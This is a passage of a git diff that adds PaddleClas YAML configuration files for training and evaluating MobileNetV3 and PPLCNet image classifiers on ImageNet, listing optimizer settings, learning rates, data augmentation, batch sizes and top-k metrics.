+ transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_75.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_75.yaml new file mode 100644 index 0000000..5b0b159 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_75.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x0_75 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x1_0.yaml new file mode 100644 index 0000000..56544d0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x1_0.yaml @@ -0,0 +1,131 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x1_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.65 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x1_25.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x1_25.yaml new file mode 100644 index 0000000..a0d6bf8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x1_25.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x1_25 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_35.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_35.yaml new file mode 100644 index 0000000..3525fa8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_35.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_small_x0_35 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_5.yaml new file mode 100644 index 0000000..0156199 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_5.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_small_x0_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_75.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_75.yaml new file mode 100644 index 0000000..058e81f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_75.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_small_x0_75 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x1_0.yaml new file mode 100644 index 0000000..df15f7a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x1_0.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_small_x1_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x1_25.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x1_25.yaml new file mode 100644 index 0000000..7db67b5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x1_25.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_small_x1_25 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_25.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_25.yaml new file mode 100644 index 0000000..6773af7 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_25.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x0_25 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_35.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_35.yaml new file mode 100644 index 0000000..36aa3dc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_35.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x0_35 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_5.yaml new file mode 100644 index 0000000..3ffc493 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_5.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x0_5 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + 